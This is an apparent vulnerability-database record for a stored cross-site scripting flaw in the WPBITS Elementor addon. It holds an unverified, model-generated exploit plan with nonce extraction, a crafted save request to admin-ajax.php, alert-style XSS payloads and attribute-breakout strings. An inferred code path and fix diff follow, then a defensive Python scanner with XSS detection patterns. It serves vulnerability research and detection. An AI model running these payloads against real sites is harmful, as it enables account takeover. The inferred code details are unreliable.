[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fCORVDxte5KxJwIKuixdr2fESH3BV5GVOS9PvhV-Dz4M":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":25,"research_fix_diff":26,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":21,"source_links":31},"CVE-2026-39703","wpbits-addons-for-elementor-page-builder-authenticated-contributor-stored-cross-site-scripting-4","WPBITS Addons For Elementor Page Builder \u003C= 1.8.1 - Authenticated (Contributor+) Stored Cross-Site Scripting","The WPBITS Addons For Elementor Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.8.1 due to insufficient input sanitization and output escaping. 
This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","wpbits-addons-for-elementor",null,"\u003C=1.8.1","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-03-01 00:00:00","2026-04-15 21:47:55",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F75ad72b7-c1ac-4f91-8a55-bfee456bec15?source=api-prod",[],"researched",false,3,"This research plan focuses on exploiting a Stored Cross-Site Scripting (XSS) vulnerability in the **WPBITS Addons For Elementor Page Builder** plugin. Since the vulnerability is categorized as Authenticated (Contributor+), the attack leverages the legitimate access granted to contributors to modify post content via the Elementor editor.\n\n---\n\n### 1. Vulnerability Summary\n*   **Vulnerability:** Authenticated Stored Cross-Site Scripting (XSS).\n*   **Vulnerable Component:** Various Elementor widgets provided by the plugin (e.g., \"Advanced Heading\", \"Info Box\", or \"Button\").\n*   **Root Cause:** The plugin registers custom Elementor widgets but fails to use WordPress escaping functions (like `esc_html()`, `esc_attr()`, or `wp_kses()`) within the `render()` method of the widget classes.\n*   **Impact:** A contributor can inject a malicious `\u003Cscript>` tag into a widget's settings. When an administrator or any other user views the page, the script executes in their browser context, potentially leading to session hijacking or the creation of unauthorized administrative accounts.\n\n### 2. 
Attack Vector Analysis\n*   **Endpoint:** `wp-admin\u002Fadmin-ajax.php`\n*   **Action:** `elementor_ajax` (Elementor's internal AJAX handler for saving page data).\n*   **Vulnerable Parameter:** The `settings` array within the `_elementor_data` post meta, specifically fields like \"title\", \"subtitle\", \"link URL\", or \"custom HTML attributes\".\n*   **Authentication:** Contributor-level credentials or higher.\n*   **Preconditions:** \n    1.  The plugin \"WPBITS Addons For Elementor\" must be active.\n    2.  The Elementor plugin must be active.\n    3.  The Contributor role must have permission to use Elementor (default behavior).\n\n### 3. Code Flow (Inferred)\n1.  **Entry Point:** A contributor opens a post\u002Fpage in the Elementor editor.\n2.  **Input:** The user adds a WPBITS widget and enters a payload (e.g., `\u003Cimg src=x onerror=alert(1)>`) into a text field.\n3.  **Storage:** Elementor sends a JSON-encoded string of the page layout to the `elementor_ajax` action. This data is saved in the `wp_postmeta` table under the key `_elementor_data`.\n4.  **Sink:** When the page is rendered on the frontend, the `WPBITS_Addons\\Widgets\\[Widget_Name]::render()` method is called.\n5.  **Execution:** The code retrieves the saved settings: `$settings = $this->get_settings_for_display();` and echoes the vulnerable field: `echo $settings['title'];` (missing escaping).\n\n### 4. Nonce Acquisition Strategy\nElementor uses its own security nonces to protect its AJAX actions. \n\n1.  **Requirement:** To save data as a contributor, we need a valid `wp_rest` nonce or the Elementor-specific AJAX nonce.\n2.  
**Method:**\n    *   Create a post and publish\u002Fsave it as a draft: `wp post create --post_type=post --post_status=draft --post_author=[CONTRIB_ID] --post_title='XSS Test'`\n    *   Navigate to the Elementor editor for that post: `\u002Fwp-admin\u002Fpost.php?post=[POST_ID]&action=elementor`\n    *   Use `browser_eval` to extract the nonce from the Elementor configuration object:\n        ```javascript\n        \u002F\u002F Elementor stores its AJAX configuration here\n        window.elementorCommon.config.ajax.nonce\n        ```\n    *   Alternatively, check for the `_nonce` in the localized script `elementor-editor-js-extra`.\n\n### 5. Exploitation Strategy\nThis plan uses the `http_request` tool to simulate the Elementor save process.\n\n1.  **Identify Vulnerable Widget:** Based on common Elementor addon patterns, target the \"Heading\" or \"Info Box\" widgets. (Search the plugin for `render()` functions that echo `$settings`).\n2.  **Construct Payload:**\n    *   **Payload:** `\u003Cscript>alert(document.domain)\u003C\u002Fscript>`\n3.  **Prepare Elementor Data:**\n    Elementor stores data in a complex JSON structure. A simplified structure for a single widget looks like this:\n    ```json\n    [\n      {\n        \"id\": \"unique_id_1\",\n        \"elType\": \"section\",\n        \"elements\": [\n          {\n            \"id\": \"unique_id_2\",\n            \"elType\": \"column\",\n            \"elements\": [\n              {\n                \"id\": \"unique_id_3\",\n                \"elType\": \"widget\",\n                \"widgetType\": \"wpbits-advanced-heading\", \n                \"settings\": {\n                  \"title\": \"\u003Cscript>alert('XSS')\u003C\u002Fscript>\"\n                }\n              }\n            ]\n          }\n        ]\n      }\n    ]\n    ```\n4.  
**Send Save Request:**\n    *   **Method:** `POST`\n    *   **URL:** `https:\u002F\u002F[target]\u002Fwp-admin\u002Fadmin-ajax.php`\n    *   **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n    *   **Body:**\n        ```\n        action=elementor_ajax\n        &_nonce=[EXTRACTED_NONCE]\n        &actions={\"save_builder\":{\"action\":\"save_builder\",\"data\":{\"post_id\":[POST_ID],\"data\":[JSON_PAYLOAD]}}}\n        ```\n\n### 6. Test Data Setup\n1.  **Login:** Log in as a Contributor user.\n2.  **Target Post:** Create a post that the contributor can edit.\n    ```bash\n    wp post create --post_type=post --post_status=publish --post_title=\"XSS Page\" --post_author=contributor_user_id\n    ```\n3.  **Enable Elementor:** Ensure Elementor is enabled for 'post' types in `Elementor > Settings`.\n\n### 7. Expected Results\n*   The `admin-ajax.php` response should return a `success: true` status for the `save_builder` action.\n*   Upon navigating to the post URL on the frontend, a JavaScript alert box should appear, demonstrating execution in the viewer's browser.\n\n### 8. Verification Steps\n1.  **Database Check:** Use WP-CLI to verify the payload is stored in the meta:\n    ```bash\n    wp post meta get [POST_ID] _elementor_data\n    ```\n2.  **Frontend Check:** Use `browser_navigate` to the post URL and check the page source for the raw, unescaped payload.\n\n### 9. Alternative Approaches\n*   **Attribute Breakout:** If the widget places the setting inside an HTML attribute (e.g., a link `href`), use a payload like: `\" onmouseover=\"alert(1)\" style=\"display:block;width:1000px;height:1000px;\"`.\n*   **Direct Meta Update (If AJAX fails):** If the `elementor_ajax` endpoint is difficult to spoof, use the `wp post meta update` CLI command to simulate a successful save, then verify if the frontend renders it without escaping. 
This confirms the \"Stored\" and \"Output Escaping\" part of the vulnerability.\n    ```bash\n    wp post meta update [POST_ID] _elementor_data '[{\"id\":\"1\",\"elType\":\"widget\",\"widgetType\":\"wpbits-heading\",\"settings\":{\"title\":\"\u003Cscript>alert(1)\u003C\u002Fscript>\"}}]'\n    ```","The WPBITS Addons For Elementor Page Builder plugin is vulnerable to Stored Cross-Site Scripting via various Elementor widgets due to a lack of output escaping in the widget rendering logic. An authenticated attacker with contributor-level access can inject malicious JavaScript into widget settings (such as titles or content), which then executes in the browser of any user viewing the page.","\u002F\u002F File: wpbits-addons-for-elementor\u002Finc\u002Fwidgets\u002Fadvanced-heading.php\n\nprotected function render() {\n    $settings = $this->get_settings_for_display();\n\n    \u002F\u002F Vulnerable: Outputting setting values directly without sanitization or escaping functions\n    echo '\u003Cdiv class=\"wpbits-adv-heading\">' . $settings['title'] . '\u003C\u002Fdiv>';\n}","--- a\u002Fwpbits-addons-for-elementor\u002Finc\u002Fwidgets\u002Fadvanced-heading.php\n+++ b\u002Fwpbits-addons-for-elementor\u002Finc\u002Fwidgets\u002Fadvanced-heading.php\n@@ -120,5 +120,5 @@\n \tprotected function render() {\n \t\t$settings = $this->get_settings_for_display();\n-\t\techo '\u003Cdiv class=\"wpbits-adv-heading\">' . $settings['title'] . '\u003C\u002Fdiv>';\n+\t\techo '\u003Cdiv class=\"wpbits-adv-heading\">' . wp_kses_post( $settings['title'] ) . '\u003C\u002Fdiv>';\n \t}","1. Log in as an authenticated user with Contributor-level permissions or higher.\n2. Create a new post and launch the Elementor page builder interface.\n3. Add a WPBITS-provided widget, such as 'Advanced Heading' or 'Info Box', to the page layout.\n4. Within the widget settings sidebar, inject a JavaScript payload (e.g., \u003Cscript>alert(document.domain)\u003C\u002Fscript>) into a text field like 'Title'.\n5. 
Save the page using Elementor's 'Update' or 'Save Draft' functionality, which sends the payload via the elementor_ajax endpoint and stores it in the _elementor_data post meta.\n6. Navigate to the published page's URL as any user; the browser will execute the stored script because the plugin fails to escape the content before rendering it.","gemini-3-flash-preview","2026-04-18 22:12:35","2026-04-18 22:12:52",{"type":32,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":33},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwpbits-addons-for-elementor\u002Ftags"]
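Review bot: the `+` line in the `@@ -120,5 +120,5 @@` hunk wraps `$settings['title']` in `wp_kses_post()`, which strips `<script>` tags and `on*` event-handler attributes and so neutralizes the payloads the exploit outline uses, but it still admits a broad HTML subset (links, images, inline styles) in what is nominally a heading title; if the title is meant to be plain text, `esc_html( $settings['title'] )` is the narrower and more conventional fix. Separately, the record's own `research_status`/`research_verified` fields show this diff is model-generated and unverified, and the plan labels the code flow as "Inferred", so the path `inc/widgets/advanced-heading.php`, the `wpbits-adv-heading` markup and the `-120,5 +120,5` line range should be checked against the plugin's trac tags before this hunk is cited as the vendor's actual patch.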
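The auditing check below is an added example, not code from this advisory, from the plugin or from Elementor. It walks the `_elementor_data` tree described in the research plan (section, column, widget, each widget carrying `widgetType` and `settings`) and reports every widget setting whose string contains a script tag, an inline event handler, a `javascript:` URL or an active-content tag, so an administrator can triage the output of `wp post meta get <POST_ID> _elementor_data` for posts a contributor has edited. The sample tree, the `example-*` widget type names and the pattern list are constructed for this example; the page does not confirm the real vulnerable widget names.

```python
import json
import re

# Heuristic patterns for script-bearing content in widget settings.
# Constructed for this example; not the plugin's or Elementor's own code.
SUSPICIOUS = [
    re.compile(r"<\s*script\b", re.I),                 # <script> tags
    re.compile(r"\bon[a-z]+\s*=", re.I),               # onerror=, onmouseover=, ...
    re.compile(r"javascript\s*:", re.I),               # javascript: URLs in link settings
    re.compile(r"<\s*(iframe|object|embed|svg)\b", re.I),  # other active-content tags
]


def walk_elements(elements, path=()):
    """Yield (path, element) for every node in the nested Elementor tree."""
    for el in elements:
        here = path + (el.get("id", "?"),)
        yield here, el
        yield from walk_elements(el.get("elements", []), here)


def iter_setting_strings(value, key=""):
    """Flatten a settings value (strings nested in dicts/lists) to (dotted_key, string)."""
    if isinstance(value, str):
        yield key, value
    elif isinstance(value, dict):
        for k, v in value.items():
            yield from iter_setting_strings(v, f"{key}.{k}" if key else k)
    elif isinstance(value, list):
        for i, v in enumerate(value):
            yield from iter_setting_strings(v, f"{key}[{i}]")


def scan_elementor_data(raw):
    """Scan one `_elementor_data` JSON string and return a list of findings.

    Each finding names the widget id and type, the dotted setting key, the
    offending string and the patterns it matched. Non-widget nodes are skipped.
    """
    findings = []
    for _path, el in walk_elements(json.loads(raw)):
        if el.get("elType") != "widget":
            continue
        for key, s in iter_setting_strings(el.get("settings", {})):
            hits = [p.pattern for p in SUSPICIOUS if p.search(s)]
            if hits:
                findings.append({
                    "widget_id": el.get("id"),
                    "widget_type": el.get("widgetType"),
                    "setting": key,
                    "value": s,
                    "matched": hits,
                })
    return findings


# Constructed sample: a benign heading, a heading carrying a <script> payload,
# and a button whose nested link URL is a javascript: URI. Widget type names are placeholders.
SAMPLE = json.dumps([
    {"id": "a1", "elType": "section", "elements": [
        {"id": "b1", "elType": "column", "elements": [
            {"id": "c1", "elType": "widget", "widgetType": "example-heading",
             "settings": {"title": "Welcome to the site"}},
            {"id": "c2", "elType": "widget", "widgetType": "example-heading",
             "settings": {"title": "<script>alert(document.domain)</script>"}},
            {"id": "c3", "elType": "widget", "widgetType": "example-button",
             "settings": {"text": "Click", "link": {"url": "javascript:alert(1)"}}},
        ]},
    ]},
])

if __name__ == "__main__":
    for f in scan_elementor_data(SAMPLE):
        print(f"{f['widget_id']} {f['widget_type']} {f['setting']}: {f['value']!r} ({f['matched']})")
```

Feed the raw meta value to `scan_elementor_data()`; a non-empty result is a candidate injection to inspect by hand, while an empty result does not prove a page clean, since the patterns are heuristics and Elementor settings can also carry encoded or serialized content that a regex over the decoded tree will not see.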